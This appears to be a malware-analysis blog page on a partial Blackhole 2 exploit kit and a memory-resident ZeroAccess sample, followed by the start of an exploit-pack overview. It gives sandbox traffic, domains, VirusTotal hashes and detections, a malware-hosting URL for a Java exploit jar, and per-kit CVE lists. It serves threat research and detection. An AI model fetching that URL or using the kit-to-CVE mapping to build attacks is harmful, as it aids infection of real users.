³ ³ words.dat ³ ³ ³ captcha ³ ³ index.html ³ ³ ³ templates ³ ³ index.html ³ ³ index.html$%C=D;O=A ³ ³ index.html$%C=D;O=D ³ ³ index.html$%C=M;O=A ³ ³ index.html$%C=M;O=D ³ ³ index.html$%C=N;O=A ³ ³ index.html$%C=N;O=D ³ ³ index.html$%C=S;O=A ³ ³ index.html$%C=S;O=D ³ ³ referers_bstat.php ³ ³ ³ css ³ ³ index.html ³ ³ index.html$%C=D;O=A ³ ³ index.html$%C=D;O=D ³ ³ index.html$%C=M;O=A ³ ³ index.html$%C=M;O=D ³ ³ index.html$%C=N;O=A ³ ³ index.html$%C=N;O=D ³ ³ index.html$%C=S;O=A ³ ³ index.html$%C=S;O=D ³ ³ main.css ³ ³ ³ img ³ ³ accept.png ³ ³ add.png ³ ³ ajax-loader.gif ³ ³ av.png ³ ³ bg-poz.gif ³ ³ bold.gif ³ ³ browsers.gif ³ ³ center.gif ³ ³ countries.gif ³ ³ del.png ³ ³ delete.png ³ ³ edit.png ³ ³ err.png ³ ³ exploit.gif ³ ³ help.gif ³ ³ image.gif ³ ³ indent.gif ³ ³ index.html ³ ³ index.html$%C=D;O=A ³ ³ index.html$%C=D;O=D ³ ³ index.html$%C=M;O=A ³ ³ index.html$%C=M;O=D ³ ³ index.html$%C=N;O=A ³ ³ index.html$%C=N;O=D ³ ³ index.html$%C=S;O=A ³ ³ index.html$%C=S;O=D ³ ³ infin.png ³ ³ italic.gif ³ ³ left.gif ³ ³ less.png ³ ³ link.gif ³ ³ logo.png ³ ³ max.png ³ ³ min.png ³ ³ more.png ³ ³ ol.gif ³ ³ oses.gif ³ ³ outdent.gif ³ ³ play.png ³ ³ plus.png ³ ³ refresh.gif ³ ³ refresh.gif_Zone.Identifier_$DATA ³ ³ right.gif ³ ³ sem_g.png ³ ³ sem_y.png ³ ³ stat.gif ³ ³ trash.png ³ ³ ul.gif ³ ³ underline.gif ³ ³ uniq0.png ³ ³ uniq1.png ³ ³ uniq2.png ³ ³ unlim-graph.gif ³ ³ ³ js ³ datepicker.js ³ form.js ³ index.html ³ index.html$%C=D;O=A ³ index.html$%C=D;O=D ³ index.html$%C=M;O=A ³ index.html$%C=M;O=D ³ index.html$%C=N;O=A ³ index.html$%C=N;O=D ³ index.html$%C=S;O=A ³ index.html$%C=S;O=D ³ main.js ³ wysiwyg.js ³ links index.html index.html$%C=D;O=A index.html$%C=D;O=D index.html$%C=M;O=A index.html$%C=M;O=D index.html$%C=N;O=A index.html$%C=N;O=D index.html$%C=S;O=A index.html$%C=S;O=D

These files are 0 bytes
api.php
bhstat.php
browser.php
config.php
cron_check.php
cron_checkdomains.php
cron_updatetor.php
db.php
files.php
js.php
lang.php
logs.php
referers_bstat.php
sc.php
template.php
threads.php

ZeroAccess file information

This version of Zeroaccess does not user kernel mode drivers and is completely memory resident. It is very well described here

Clickserver component is present in this version - just like desribed in the ethicalhackers.info article above, with a very high volume peer to peer UDP and clickfraud traffic. The pcap files are in the analysis package for download above.

Traffic conversations over 7 minute period (over 300 advertising and shopping websites)

204.246.175.161 <-> 192.168.106.131
192.168.106.131 <-> 108.161.187.128
199.48.130.115 <-> 192.168.106.131
192.168.106.131 <-> 108.166.200.6
192.168.106.131 <-> 184.82.24.134
192.168.106.131 <-> 184.84.79.139
192.168.106.131 <-> 74.125.228.124
192.168.106.131 <-> 69.167.130.41
192.168.106.131 <-> 82.15.9.23
192.168.106.131 <-> 23.15.8.49
192.168.106.131 <-> 74.125.228.101
192.168.106.131 <-> 66.45.56.124
192.168.106.131 <-> 31.184.245.120
192.168.106.131 <-> 173.241.242.19
192.168.106.131 <-> 81.17.18.18
192.168.106.131 <-> 74.125.228.105
192.168.106.131 <-> 74.125.228.123
192.168.106.131 <-> 74.125.228.111
192.168.106.131 <-> 31.184.244.180
192.168.106.131 <-> 72.172.76.147
192.168.106.131 <-> 23.23.221.221
199.7.55.190 <-> 192.168.106.131
192.168.106.131 <-> 95.211.193.31
199.115.115.136 <-> 192.168.106.131
199.115.119.13 <-> 192.168.106.131
192.168.106.131 <-> 66.85.130.234
192.168.106.131 <-> 91.242.217.247
192.168.106.131 <-> 78.138.127.91
192.168.106.131 <-> 50.56.71.127
192.168.106.131 <-> 50.22.196.70
208.91.207.10 <-> 192.168.106.131
192.168.106.131 <-> 77.38.231.158
192.168.106.131 <-> 23.28.85.244
192.168.106.131 <-> 97.84.153.254
192.168.106.131 <-> 46.51.106.88
192.168.106.131 <-> 71.60.166.81
192.168.106.131 <-> 178.118.157.100
192.168.106.131 <-> 94.240.206.253
213.254.65.254 <-> 192.168.106.131
192.168.106.131 <-> 27.4.224.250
192.168.106.131 <-> 188.140.25.248
192.168.106.131 <-> 79.117.106.180
192.168.106.131 <-> 35.24.7.218
192.168.106.131 <-> 62.194.102.30
192.168.106.131 <-> 62.42.156.68
192.168.106.131 <-> 186.191.31.15
192.168.106.131 <-> 75.69.60.61
192.168.106.131 <-> 174.60.155.33
192.168.106.131 <-> 69.132.12.47
192.168.106.131 <-> 24.237.97.6
192.168.106.131 <-> 98.185.56.2
192.168.106.131 <-> 151.97.52.41
192.168.106.131 <-> 80.99.172.35
192.168.106.131 <-> 64.53.160.8
192.168.106.131 <-> 24.177.160.32
192.168.106.131 <-> 95.105.33.122
192.168.106.131 <-> 14.96.175.20
213.114.133.252 <-> 192.168.106.131
192.168.106.131 <-> 46.246.253.254
192.168.106.131 <-> 14.97.234.253
192.168.106.131 <-> 174.73.121.250
192.168.106.131 <-> 67.191.216.248
192.168.106.131 <-> 24.201.250.35
192.168.106.131 <-> 79.252.253.254
192.168.106.131 <-> 88.254.253.254
192.168.106.131 <-> 77.20.11.250
192.168.106.131 <-> 117.198.90.217
192.168.106.131 <-> 91.224.118.23
192.168.106.131 <-> 85.238.66.247
192.168.106.131 <-> 27.252.253.254
192.168.106.131 <-> 98.251.253.254
192.168.106.131 <-> 89.18.29.242
192.168.106.131 <-> 78.250.253.254
192.168.106.131 <-> 184.253.253.254
192.168.106.131 <-> 180.253.253.254
192.168.106.131 <-> 88.134.163.247
192.168.106.131 <-> 98.185.61.35
192.168.106.131 <-> 188.59.32.14
192.168.106.131 <-> 173.217.170.90
192.168.106.131 <-> 78.251.204.239
192.168.106.131 <-> 75.118.98.244
192.168.106.131 <-> 95.160.221.57
192.168.106.131 <-> 103.2.134.49
192.168.106.131 <-> 74.210.136.39
192.168.106.131 <-> 151.100.40.30
201.210.194.240 <-> 192.168.106.131
192.168.106.131 <-> 68.55.129.10
192.168.106.131 <-> 12.53.117.237
212.8.125.246 <-> 192.168.106.131
192.168.106.131 <-> 85.86.55.242
192.168.106.131 <-> 68.96.51.72
192.168.106.131 <-> 31.16.216.244
192.168.106.131 <-> 115.240.7.35
192.168.106.131 <-> 14.99.81.243
192.168.106.131 <-> 77.250.182.144
192.168.106.131 <-> 81.248.253.254
203.247.253.254 <-> 192.168.106.131
197.247.253.254 <-> 192.168.106.131
192.168.106.131 <-> 79.247.253.254
192.168.106.131 <-> 101.62.114.39
192.168.106.131 <-> 90.169.44.237
192.168.106.131 <-> 95.160.54.9
192.168.106.131 <-> 186.207.244.249
192.168.106.131 <-> 68.103.243.11
192.168.106.131 <-> 66.68.31.248
192.168.106.131 <-> 128.73.132.250
192.168.106.131 <-> 188.24.91.251
192.168.106.131 <-> 85.122.18.39
192.168.106.131 <-> 116.73.70.3
192.168.106.131 <-> 140.134.148.108
192.168.106.131 <-> 173.26.66.161
192.168.106.131 <-> 71.195.47.8
192.168.106.131 <-> 109.55.200.235
192.168.106.131 <-> 190.46.180.4
192.168.106.131 <-> 31.19.128.234
192.168.106.131 <-> 190.207.142.98
192.168.106.131 <-> 98.209.145.4
192.168.106.131 <-> 116.43.5.90
219.70.146.244 <-> 192.168.106.131
192.168.106.131 <-> 68.14.18.245
192.168.106.131 <-> 27.4.208.247
192.168.106.131 <-> 71.82.68.247
192.168.106.131 <-> 176.237.213.0
192.168.106.131 <-> 114.76.237.4
192.168.106.131 <-> 89.137.229.45
192.168.106.131 <-> 77.20.45.252
192.168.106.131 <-> 74.88.107.248
192.168.106.131 <-> 81.105.95.2
192.168.106.131 <-> 24.211.120.73
192.168.106.131 <-> 75.176.191.112
192.168.106.131 <-> 78.49.141.38
192.168.106.131 <-> 46.42.233.237
192.168.106.131 <-> 64.233.153.35
192.168.106.131 <-> 99.34.88.250
192.168.106.131 <-> 74.194.68.8
192.168.106.131 <-> 77.240.64.244
192.168.106.131 <-> 69.205.6.245
192.168.106.131 <-> 174.0.130.16
192.168.106.131 <-> 109.236.84.153
195.67.210.11 <-> 192.168.106.131
192.168.106.131 <-> 86.121.132.7
192.168.106.131 <-> 82.245.217.201
192.168.106.131 <-> 188.26.162.164
192.168.106.131 <-> 67.177.101.250
192.168.106.131 <-> 189.18.168.253
192.168.106.131 <-> 88.199.37.252
192.168.106.131 <-> 98.70.39.46
210.218.142.2 <-> 192.168.106.131
192.168.106.131 <-> 72.197.238.9
192.168.106.131 <-> 86.100.53.253
192.168.106.131 <-> 77.81.61.4
192.168.106.131 <-> 24.14.160.233
192.168.106.131 <-> 50.137.225.48
192.168.106.131 <-> 2.93.62.254
192.168.106.131 <-> 98.196.126.245
192.168.106.131 <-> 85.84.4.246
192.168.106.131 <-> 49.249.126.246
192.168.106.131 <-> 90.230.250.244
192.168.106.131 <-> 46.249.100.253
192.168.106.131 <-> 92.226.101.249
192.168.106.131 <-> 159.149.37.253
192.168.106.131 <-> 14.97.162.248
192.168.106.131 <-> 95.223.190.237
192.168.106.131 <-> 76.175.239.241
192.168.106.131 <-> 176.205.9.236
192.168.106.131 <-> 75.141.211.48
192.168.106.131 <-> 84.122.83.24
192.168.106.131 <-> 115.242.36.230
192.168.106.131 <-> 46.211.193.50
192.168.106.131 <-> 88.229.245.251
217.129.135.254 <-> 192.168.106.131
192.168.106.131 <-> 46.55.80.19
192.168.106.131 <-> 71.7.201.13
192.168.106.131 <-> 89.212.207.233
192.168.106.131 <-> 65.188.152.236
192.168.106.131 <-> 71.180.98.36
192.168.106.131 <-> 91.64.27.47
192.168.106.131 <-> 68.193.169.116
192.168.106.131 <-> 46.121.42.245
212.10.148.43 <-> 192.168.106.131
192.168.106.131 <-> 75.141.252.53
192.168.106.131 <-> 58.7.153.21
192.168.106.131 <-> 189.79.206.79
192.168.106.131 <-> 81.111.161.35
192.168.106.131 <-> 187.39.36.41
192.168.106.131 <-> 89.228.96.82
192.168.106.131 <-> 79.112.19.116
192.168.106.131 <-> 86.121.64.76
192.168.106.131 <-> 98.239.144.53
192.168.106.131 <-> 77.70.31.17
192.168.106.131 <-> 124.123.52.236
192.168.106.131 <-> 189.15.39.7
192.168.106.131 <-> 85.225.215.144
192.168.106.131 <-> 83.233.16.2
192.168.106.131 <-> 79.132.174.235
192.168.106.131 <-> 72.0.185.0
192.168.106.131 <-> 97.92.50.231
192.168.106.131 <-> 79.6.125.243
192.168.106.131 <-> 94.21.61.40
192.168.106.131 <-> 187.244.152.7
192.168.106.131 <-> 151.74.55.1
192.168.106.131 <-> 72.14.71.241
192.168.106.131 <-> 87.18.19.41
192.168.106.131 <-> 14.99.192.21
192.168.106.131 <-> 188.25.231.62
192.168.106.131 <-> 95.6.5.251
192.168.106.131 <-> 14.96.218.0
192.168.106.131 <-> 78.90.183.253
192.168.106.131 <-> 190.206.159.252
192.168.106.131 <-> 76.178.184.21
192.168.106.131 <-> 87.7.193.51
192.168.106.131 <-> 24.117.236.23
192.168.106.131 <-> 68.83.236.23
192.168.106.131 <-> 186.95.64.17
192.168.106.131 <-> 78.97.13.29
192.168.106.131 <-> 117.201.225.48
192.168.106.131 <-> 76.118.17.73
192.168.106.131 <-> 14.97.231.249
192.168.106.131 <-> 98.211.249.252
192.168.106.131 <-> 139.78.46.252
192.168.106.131 <-> 24.124.106.2
192.168.106.131 <-> 88.251.253.254
192.168.106.131 <-> 95.111.72.251
208.123.10.244 <-> 192.168.106.131
192.168.106.131 <-> 190.2.202.243
192.168.106.131 <-> 71.82.51.244
192.168.106.131 <-> 68.83.141.251
192.168.106.131 <-> 98.214.226.249
192.168.106.131 <-> 79.117.117.241
192.168.106.131 <-> 184.155.127.16
192.168.106.131 <-> 78.251.156.5
192.168.106.131 <-> 79.112.31.73
192.168.106.131 <-> 88.150.8.14
201.213.190.66 <-> 192.168.106.131
192.168.106.131 <-> 14.96.149.254
192.168.106.131 <-> 27.6.48.234
192.168.106.131 <-> 24.254.152.240
192.168.106.131 <-> 46.130.65.254
192.168.106.131 <-> 182.237.12.241
192.168.106.131 <-> 124.197.74.6
192.168.106.131 <-> 95.246.253.254
192.168.106.131 <-> 164.246.253.254
192.168.106.131 <-> 180.246.253.254
197.200.87.17 <-> 192.168.106.131
192.168.106.131 <-> 180.235.178.250
192.168.106.131 <-> 109.52.166.251
192.168.106.131 <-> 115.242.59.69
192.168.106.131 <-> 189.94.72.5
192.168.106.131 <-> 81.214.152.9
192.168.106.131 <-> 78.251.80.87
192.168.106.131 <-> 173.23.253.246
192.168.106.131 <-> 114.79.132.253
192.168.106.131 <-> 24.178.139.42
192.168.106.131 <-> 69.76.49.46
192.168.106.131 <-> 1.23.142.104
192.168.106.131 <-> 178.149.26.254
192.168.106.131 <-> 187.11.182.248
192.168.106.131 <-> 2.177.70.86
192.168.106.131 <-> 141.89.85.70
192.168.106.131 <-> 94.182.247.5
192.168.106.131 <-> 117.200.22.252
192.168.106.131 <-> 83.233.218.252
192.168.106.131 <-> 122.50.233.250
192.168.106.131 <-> 98.196.147.32
192.168.106.131 <-> 116.202.132.9
192.168.106.131 <-> 84.108.165.13
192.168.106.131 <-> 183.83.72.244
192.168.106.131 <-> 142.217.30.247
192.168.106.131 <-> 78.251.53.2
192.168.106.131 <-> 190.239.206.49
192.168.106.131 <-> 86.100.204.35
192.168.106.131 <-> 84.40.166.35
192.168.106.131 <-> 65.27.171.16
192.168.106.131 <-> 77.8.88.253
192.168.106.131 <-> 83.211.47.36
192.168.106.131 <-> 2.193.86.67
192.168.106.131 <-> 190.46.187.65
192.168.106.131 <-> 76.171.103.43
192.168.106.131 <-> 190.202.217.241
192.168.106.131 <-> 115.240.241.51
192.168.106.131 <-> 80.30.162.121
192.168.106.131 <-> 115.242.166.78
192.168.106.131 <-> 115.240.69.14
192.168.106.131 <-> 88.222.186.29
192.168.106.131 <-> 24.31.213.239
192.168.106.131 <-> 114.143.53.247
192.168.106.131 <-> 79.180.24.254
192.168.106.131 <-> 87.168.109.8
206.248.97.129 <-> 192.168.106.131
192.168.106.131 <-> 180.151.58.75
192.168.106.131 <-> 188.129.90.251
192.168.106.131 <-> 49.128.164.56
192.168.106.131 <-> 122.163.227.242
192.168.106.131 <-> 80.11.182.243
192.168.106.131 <-> 41.174.11.247
192.168.106.131 <-> 31.185.116.247
192.168.106.131 <-> 173.241.188.247
192.168.106.131 <-> 89.206.14.167
192.168.106.131 <-> 77.21.57.57
192.168.106.131 <-> 24.148.136.125

Domain list

5565.mnstr3.com
a0.twimg.com
ad.doubleclick.net
ads.adbrite.com
ads.footar.com
ads.pubmatic.com
ads.rubiconproject.com
apis.google.com
cdn.crowdignite.com
cdn.mydailymoment.com
cdn1.dailyrx.com
cdn2.dailyrx.com
cdn3.dailyrx.com
certificates.godaddy.com
clickga.com
clk.relestar.com
cm.g.doubleclick.net
connect.facebook.net
continella.com
crl.geotrust.com
crl.godaddy.com
edge.quantserve.com
ib.adnxs.com
image3.pubmatic.com
mpd.mxptint.net
optimized-by.rubiconproject.com
ox-d.patientconversation.com
p.hgcdn.net
pixel.quantserve.com
pixel.rubiconproject.com
ptrack.pubmatic.com
r.openx.net
r1.ace.advertising.com
redirect.ad-feeds.com
redirect.xmladfeed.com
relecart.relestar.com
relestar.com
s0.2mdn.net
search.twitter.com
static-cf-1.hgcdn.net
tap2-cdn.rubiconproject.com
thor.dailyrx.com
uac.advertising.com
websking.com
widget.crowdignite.com
widgets.twimg.com
www.dailyrx.com
www.ffog.net
www.google-analytics.com
www.google-analytics.com
www.gstatic.com
www.lifescript.com
www.relestar.com
www1.chooseyourdiet.com

Automatic scans

ZeroAccess fdc7aaf4a3
https://www.virustotal.com/file/37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453/analysis/
VirusTotal
SHA256:     b4e1acb0cfb95a075ac4b8a3304b43aa3265d2fdafb9fef3f8dd09abcbcc33a3
SHA1:     fbc15c6494f14b44a324b778ad825e822ddcce0a
MD5:     3169969e91f5fe5446909bbab6e14d5d
File size:     157.0 KB ( 160768 bytes )
File name:     fdc7aaf4a3
File type:     Win32 EXE
Detection ratio:     32 / 44
Analysis date:     2012-10-04 17:34:51 UTC ( 0 minutes ago )
More details
Antivirus     Result     Update
AhnLab-V3     Win-Trojan/Malpacked6.Gen     20121003
AntiVir     TR/Rogue.KD.735782     20121003
Antiy-AVL     -     20121002
Avast     Win32:Sirefef-ALR [Trj]     20121003
AVG     ZeroAccess.GV     20121003
BitDefender     Trojan.Generic.KD.735782     20121003
CAT-QuickHeal     Backdoor.ZAccess.ylx     20121002
Comodo     UnclassifiedMalware     20121003
DrWeb     Trojan.DownLoader6.57621     20121003
Emsisoft     -     20120919
ESET-NOD32     Win32/Sirefef.EV     20121003
F-Secure     Trojan.Generic.KD.735782     20121003
Fortinet     W32/ZAccess.VARC!tr     20121003
GData     Trojan.Generic.KD.735782     20121003
Ikarus     Trojan.ZeroAccess     20121003
Jiangmin     Backdoor/ZAccess.fas     20121002
K7AntiVirus     Backdoor     20121002
Kaspersky     Backdoor.Win32.ZAccess.ylx     20121003
Kingsoft     Win32.Troj.Generic.kd.(kcloud)     20120925
McAfee     ZeroAccess.hg     20121003
McAfee-GW-Edition     ZeroAccess.hg     20121003
Microsoft     Trojan:Win32/Sirefef.P     20121003
MicroWorld-eScan     Trojan.Generic.KD.735782     20121003
Norman     W32/Troj_Generic.EEVPB     20121003
nProtect     Trojan/W32.Agent.160768.LV     20121003
PCTools     Trojan.Zeroaccess     20121003
Rising     -     20120928
Sophos     Mal/EncPk-ACO     20121003
SUPERAntiSpyware     -     20120911
Symantec     Trojan.Zeroaccess.C     20121003
TheHacker     Backdoor/ZAccess.ylx     20121001
TotalDefense     Win32/Sirefef.KH     20121003

TrendMicro-HouseCall     TROJ_GEN.RCBH2IO     20121003
VBA32     -     20121003
VIPRE     Trojan.Win32.Generic!BT     20121003
ViRobot     Backdoor.Win32.A.ZAccess.160768.N     20121003

https://www.virustotal.com/file/f7fca74812707ec4b10b2302b8bb2a94a979f6b4d47c5557cea98f975efb1cec/analysis/
554-0002.exe
SHA256:     f7fca74812707ec4b10b2302b8bb2a94a979f6b4d47c5557cea98f975efb1cec
SHA1:     811c70ee4f61537c10a844f43ea31d309b8c95d7
MD5:     b51c93fb8d8e55d1eb935c1ed5a749f7
File size:     371.5 KB ( 380416 bytes )
File name:     b51c93fb8d8e55d1eb935c1ed5a749f7
File type:     Win32 EXE
Tags:     peexe armadillo
Detection ratio:     26 / 42
Analysis date:     2012-09-25 18:13:44 UTC ( 1 week, 1 day ago )
More details
Antivirus     Result     Update
Agnitum     -     20120925
AhnLab-V3     Trojan/Win32.FakeAV     20120925
AntiVir     TR/FakeSysdef.A.1620     20120925
Antiy-AVL     -     20120924
Avast     Win32:FakeSysdef-PX [Trj]     20120925
AVG     Generic29.BNBL     20120925
BitDefender     Trojan.Generic.KDV.736486     20120925
ByteHero     -     20120918
CAT-QuickHeal     -     20120925
ClamAV     -     20120925
Commtouch     -     20120925
Comodo     UnclassifiedMalware     20120925
DrWeb     Trojan.Fakealert.33688     20120925
Emsisoft     -     20120919
ESET-NOD32     a variant of Win32/Kryptik.AMCO     20120925
F-Prot     -     20120925
F-Secure     Trojan.Generic.KDV.736486     20120925
Fortinet     W32/FakeSysDef.DBR!tr     20120925
GData     Trojan.Generic.KDV.736486     20120925
Ikarus     Trojan.Win32.FakeSysdef     20120925
Jiangmin     Trojan/FakeSysDef.aml     20120925
Kaspersky     Trojan-FakeAV.Win32.FakeSysDef.dbr     20120925
McAfee-GW-Edition     Heuristic.LooksLike.Win32.Suspicious.B     20120925
Microsoft     Trojan:Win32/FakeSysdef     20120925
Norman     W32/Suspicious_Gen4.BCRPT     20120925
nProtect     Trojan.Generic.KDV.736486     20120925
Panda     Suspicious file     20120925
PCTools     Trojan.Gen     20120925
Symantec     Trojan.Gen     20120925
TrendMicro     TROJ_GEN.RCBCCIO     20120925
TrendMicro-HouseCall     TROJ_GEN.RCBCCIO     20120925
VBA32     -     20120925
VIPRE     Trojan.Win32.FakeSysDef.ctj (v)     20120925
ViRobot     Trojan.Win32.A.FakeSysDef.380416.O     20120925

The file is a malware known as "CRDF.Trojan.Fakealert.Win32.PEx.C.2818756116". Report on this threat: http://threatcenter.crdf.fr/?More&ID=103547 - 103547 -

https://www.virustotal.com/file/37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453/analysis/
(more on Google)
SHA256:     37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453
SHA1:     4290441b2edc07c606ffb3b6407c6b7df99413f3
MD5:     86946ec2d2031f2b456e804cac4ade6d
File size:     32.2 KB ( 33010 bytes )
File name:     java.jar
File type:     ZIP
Tags:     zip cve-2012-1723 cve-2012-0507 exploit cve-2010-1885 cve-2012-4681
Detection ratio:     25 / 41
Analysis date:     2012-10-04 07:59:34 UTC ( 10 hours, 17 minutes ago )

More details
Antivirus     Result     Update
AhnLab-V3     Java/Cve-2012-1723     20121003
AntiVir     EXP/JAVA.Ternub.Gen     20121003
Antiy-AVL     -     20121002
Avast     Java:Blacole-AB [Expl]     20121003
AVG     -     20121003
BitDefender     -     20121003
ByteHero     -     20121003
CAT-QuickHeal     Trojan.JavaExploit     20121002
ClamAV     Exploit.Java-128     20121003
Commtouch     -     20121003
Comodo     UnclassifiedMalware     20121003
DrWeb     Exploit.Java.360     20121003
Emsisoft     Exploit.Java.CVE-2012-4681!IK     20120919
ESET-NOD32     Java/Exploit.CVE-2012-4681.AM     20121003
F-Secure     Exploit:Java/CVE-2012-4681.H     20121003
GData     Java:Blacole-AB     20121003
Ikarus     Exploit.Java.CVE-2012-4681     20121003
Jiangmin     Exploit.Java.aqd     20121002
K7AntiVirus     -     20121002
Kaspersky     Exploit.Java.CVE-2012-4681.o     20121003
McAfee     JV/Exploit-Blacole!zip     20121003
McAfee-GW-Edition     JV/Exploit-Blacole!zip     20121003
Microsoft     Exploit:Java/CVE-2012-1723.AOF     20121003
MicroWorld-eScan     -     20121003
Norman     CVE-2012-4681.AW     20121003
PCTools     Trojan.Maljava     20121003
Sophos     Troj/JavaDl-PZ     20121003
Symantec     Trojan.Maljava!gen24     20121003
TotalDefense     Java/CVE-2012-0507.AN     20121003
TrendMicro     JAVA_BLACOLE.ZXX     20121003
TrendMicro-HouseCall     TROJ_GEN.F47V0918     20121003
ViRobot     Java.A.EX-CVE-2012-1723.18210     20121003

    Comments
    Votes
    Additional information

#Malware
Posted 2 days, 21 hours ago by internetchicken
Blackhole 2.0
Posted 1 week, 1 day ago by ReviewsAntivirus
#Exploit

http://31.184.244.9/data/java.jar
Posted 1 week, 1 day ago by ReviewsAntivirus
#malware
Posted 1 week, 6 days ago by ReviewsAntivirus
FYI report: http://malwaremustdie.blogspot.jp/2012/09/a-geeek-way-in-reversing-cve-2010-1885.html

https://www.virustotal.com/file/44230ca95626445daa1c25022f06e78f9cb7ff71afda50709e676c0b814909d2/analysis/1349375492/
spn.jar

VirusTotal
SHA256:    44230ca95626445daa1c25022f06e78f9cb7ff71afda50709e676c0b814909d2
SHA1:    03547b45e30d92aa721c354cca21b6d8324c419f
MD5:    add1d01ba06d08818ff6880de2ee74e8
File size:    10.2 KB ( 10397 bytes )
File name:    spn.jar
File type:    ZIP
Detection ratio:    10 / 44
Analysis date:    2012-10-04 18:31:32 UTC ( 0 minutes ago )
AntiVir    JAVA/Jogek.Z    20121003
Avast    Java:Malware-gen [Trj]    20121003
ESET-NOD32    a variant of Java/Exploit.CVE-2012-4681.AV    20121003
F-Secure    Exploit:Java/CVE-2012-4681.H    20121003
GData    Java:Malware-gen    20121003
Ikarus    Java.Malware    20121003
Kaspersky    HEUR:Exploit.Java.CVE-2012-4681.gen    20121003
Symantec    Trojan.Maljava    20121003
TrendMicro-HouseCall    TROJ_GEN.F47V0921    20121003

https://www.virustotal.com/file/566dff67f099f6cd5527de451d05da556789f0da8c0f568ac45d473c2adf31a9/analysis/1349376388/
SHA256:     566dff67f099f6cd5527de451d05da556789f0da8c0f568ac45d473c2adf31a9
SHA1:     4dcc1ada5c9a61e9cea8025ac5f1670e7ab6d2c4
MD5:     c7abd2142f121bd64e55f145d4b860fa
File size:     12.4 KB ( 12701 bytes )
File name:     spn2.jar
File type:     ZIP
Detection ratio:     16 / 43
Analysis date:     2012-10-04 18:46:28 UTC ( 1 minute ago )
AntiVir     JAVA/Jogek.AV     20121003
Antiy-AVL     -     20121002
Avast     Java:CVE-2012-4681-BF [Expl]     20121003
Comodo     UnclassifiedMalware     20121003
DrWeb     Exploit.CVE2012-1723.13     20121003
ESET-NOD32     a variant of Java/Exploit.Agent.NDL     20121003
F-Prot     -     20120926
GData     Java:CVE-2012-4681-BF     20121003
Ikarus     Exploit.Java.CVE-2012     20121003
Kaspersky     UDS:DangerousObject.Multi.Generic     20121003
McAfee     Exploit-CVE2012-1723.c     20121003
McAfee-GW-Edition     Exploit-CVE2012-1723.c     20121003
Microsoft     Exploit:Java/CVE-2012-1723.AVJ     20121003
MicroWorld-eScan     -     20121003
PCTools     Trojan.Maljava     20121003
Sophos     Troj/Java-IZ     20121003
SUPERAntiSpyware     -     20120911
Symantec     Trojan.Maljava     20121003
TrendMicro     JAVA_DLOADER.AZL     20121003
TrendMicro-HouseCall     TROJ_GEN.F47V0921     20121003

https://www.virustotal.com/file/1e9e19cc0e6c49f658f6205d19d3940698cbe22df6cdb149c8178857992473e7/analysis/
SHA256:     1e9e19cc0e6c49f658f6205d19d3940698cbe22df6cdb149c8178857992473e7
SHA1:     6f7459226871ed3822c840ca465612475f635801
MD5:     d1e2ff36a6c882b289d3b736d915a6cc
File size:     7.9 KB ( 8103 bytes )
File name:     t.pdf
File type:     PDF
Tags:     pdf acroform invalid-xref
Detection ratio:     18 / 43
Analysis date:     2012-10-04 17:30:11 UTC ( 1 hour, 19 minutes ago )

More details
Antivirus     Result     Update
Avast     -     20121003
AVG     Exploit_c.VQN     20121004
BitDefender     Exploit.PDF-JS.GR     20121004
Comodo     UnclassifiedMalware     20121004
DrWeb     Exploit.PDF.2990     20121004
Emsisoft     Trojan.Exploit_c!IK     20120919
F-Secure     Exploit.PDF-JS.GR     20121003
Fortinet     W32/PDFJs.AAG!tr     20121004
GData     Exploit.PDF-JS.GR     20121004
Ikarus     Trojan.Exploit_c     20121004
McAfee     Exploit-PDF!Blacole.p     20121004
McAfee-GW-Edition     Exploit-PDF!Blacole.p     20121004
Microsoft     Exploit:Win32/Pdfjsc.RM     20121004
nProtect     Exploit.PDF-JS.GR     20121004
PCTools     Trojan.Pidief     20121004
SUPERAntiSpyware     -     20120911
Symantec     Trojan.Pidief     20121003
TrendMicro     TROJ_PDFJSC.AAW     20121004
TrendMicro-HouseCall     TROJ_PDFJSC.AAW     20121004

↧

An Overview of Exploit Packs (Update 17) October 12, 2012

October 12, 2012, 10:20 am

≫ Next: CVE-2012-1535 Adobe Flash Player Integer Overflow Vulnerability Analysis by Brian Mariani & Frédéric Bourla

≪ Previous: Blackhole 2 exploit kit (partial pack) and ZeroAccess (user-mode memory resident version)

The long overdue Exploit pack table Update 17 is finally here. It got a colorful facelift and has newer packs (Dec. 2011-today) on a separate sheet for easier reading.
Updates / new entries for the following 13 packs have been added (see exploit listing below)

Redkit
Neo Sploit
Cool Pack
Black hole 2.0
Black hole 1.2.5
Private no name
Nuclear 2.2 (Update to 2.0 - actual v. # is unknown)
Nuclear 2.1 (Update to 2.0 - actual v. # is unknown)
CrimeBoss
Grandsoft
Sweet Orange 1.1 Update to 1.0 actual v. # is unknown)
Sweet Orange 1.0
Phoenix 3.1.15
NucSoft
Sakura 1.1 (Update to 1.0 actual v. # is unknown)
AssocAID (unconfirmed)

The full table in xls format - Version 17 can be downloaded from here.

Exploit lists for the added/updated packs

AssocAID (unconfirmed)

09-'12

CVE-2011-3106

CVE-2012-1876

CVE-2012-1880

CVE-2012-3683

Unknown CVE

Redkit

08-'12

CVE-2010-0188

CVE-2012-0507

CVE-2012-4681

Neo Sploit

09-'12

CVE-2012-1723

CVE-2012-4681

Cool

08-'12

CVE-2006-0003

CVE-2010-0188

CVE-2011-3402

CVE-2012-0507

CVE-2012-1723

CVE-2012-4681

Black hole 2.0

09-'12

CVE-2006-0003

CVE-2010-0188

CVE-2012-0507

CVE-2012-1723

CVE-2012-4681

CVE-2012-4969 promised

Black hole 1.2.5

08-'12

CVE-2006-0003

CVE-2007-5659 /2008-0655

CVE-2008-2992

CVE-2009-0927

CVE-2010-0188

CVE-2010-1885

CVE-2011-0559

CVE-2011-2110

CVE-2012-1723

CVE-2012-1889

CVE-2012-4681

Private no name

09-'12

CVE-2010-0188

CVE-2012-1723

CVE-2012-4681

Nuclear 2.2 (Update to 2.0 - actual v. # is unknown)

03-'12

CVE-2010-0188

CVE-2011-3544

CVE-2012-1723

CVE-2012-4681

Nuclear 2.1 (Update to 2.0 - actual v. # is unknown)

03-'12

CVE-2010-0188

CVE-2011-3544

CVE-2012-1723

CrimeBoss

09-'12

Java Signed Applet

CVE-2011-3544

CVE-2012-4681

Grandsoft

09-'12

CVE-2010-0188

CVE-2011-3544

Sweet Orange 1.1

09-'12

CVE-2006-0003

CVE-2010-0188

CVE-2011-3544

